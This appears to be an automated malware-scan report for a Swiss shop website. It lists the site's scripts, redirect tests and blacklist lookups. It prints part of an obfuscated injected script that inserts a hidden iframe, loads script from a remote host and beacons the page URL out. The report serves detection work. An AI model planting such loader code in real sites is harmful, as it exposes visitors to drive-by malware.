Scanned pages/files
Request | Server response | Status |
http://www.fahnentschudi.ch/ | 200 OK Content-Length: 41340 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. ...[557 bytes skipped]... ventListener?e.addEventListener(b,d,false):e.attachEvent("on"+b,d); (function(){function l(j){j="head";return["<",j,"></",j,"><",z,' onl'+'oad="var d=',B,";d.getElementsByTagName('head')[0].",y,"(d.",A,"('script')).",u,"='",a,"//",c.l,"'",'"',"></",z,">"].join("")}var z="body",s=h[z];if(!s){return setTimeout(arguments.callee,100)}c.P(1);var y="appendChild",A="createElement",u="src",r=h[A]("div"),G=r[y](h[A](g)),D=h[A]("iframe"),B="document",C="domain",q;r.style.display="none";s.insertBefore(r,s.firstChild).id=g;D.frameBorder="0";D.id=g+"-loader";if(/MSIE[ ]+6/.test(navigator.userAgent)){D.src="javascript:false"} D.allowTransparency="true";G[y](D);try{D.contentWindow[B].open()}catch(F){i[C]=h[C];q="javascript:var d="+B+".open();d.domain='"+h.domain+"';";D[u]=q+"void(0);"}try{var H=D.contentWindow[B];H.write(l());H.close()}catch(E){D[u]=q+'d.write("'+l().replace(/"/g,String.fromCharCode(92)+'"')+'");d.close( ...[356 bytes skipped]... Decoded script: function () { if (c.f) { (new Image).src = a + "//" + c.l.replace(".js", ".png") + "&" + escape(e.location.href); } c.f = null; } /*** called setTimeout with function () { if (c.f) { (new Image).src = a + "//" + c.l.replace(".js", ".png") + "&" + escape(e.location.href); } c.f = null; }, 20000 */ function d() { c.P(b); e[g](b); } | ||
http://www.fahnentschudi.ch/js/prototype/prototype.js | 200 OK Content-Length: 129960 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/prototype/validation.js | 200 OK Content-Length: 34400 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/scriptaculous/builder.js | 200 OK Content-Length: 4744 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/scriptaculous/effects.js | 200 OK Content-Length: 38745 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 31192 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/scriptaculous/controls.js | 200 OK Content-Length: 34797 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/scriptaculous/slider.js | 200 OK Content-Length: 10331 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/varien/js.js | 200 OK Content-Length: 16581 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/varien/form.js | 200 OK Content-Length: 11714 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/varien/menu.js | 200 OK Content-Length: 4426 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/mage/translate.js | 200 OK Content-Length: 1597 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/mage/cookies.js | 200 OK Content-Length: 2615 Content-Type: text/javascript | clean |
http://www.fahnentschudi.ch/js/livechat/js.js | 200 OK Content-Length: 1277 Content-Type: text/javascript | clean |
http://www.googleadservices.com/pagead/conversion.js | 200 OK Content-Length: 10592 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fahnentschudi.ch
Result:
GET / HTTP/1.1
Host: fahnentschudi.ch
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: fahnentschudi.ch
Referer: http://www.google.com/search?q=fahnentschudi.ch
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fahnentschudi.ch
Referer: http://www.google.com/search?q=fahnentschudi.ch
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fahnentschudi.ch
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fahnentschudi.ch/
Result: fahnentschudi.ch is not infected or malware details are not published yet.
Result: fahnentschudi.ch is not infected or malware details are not published yet.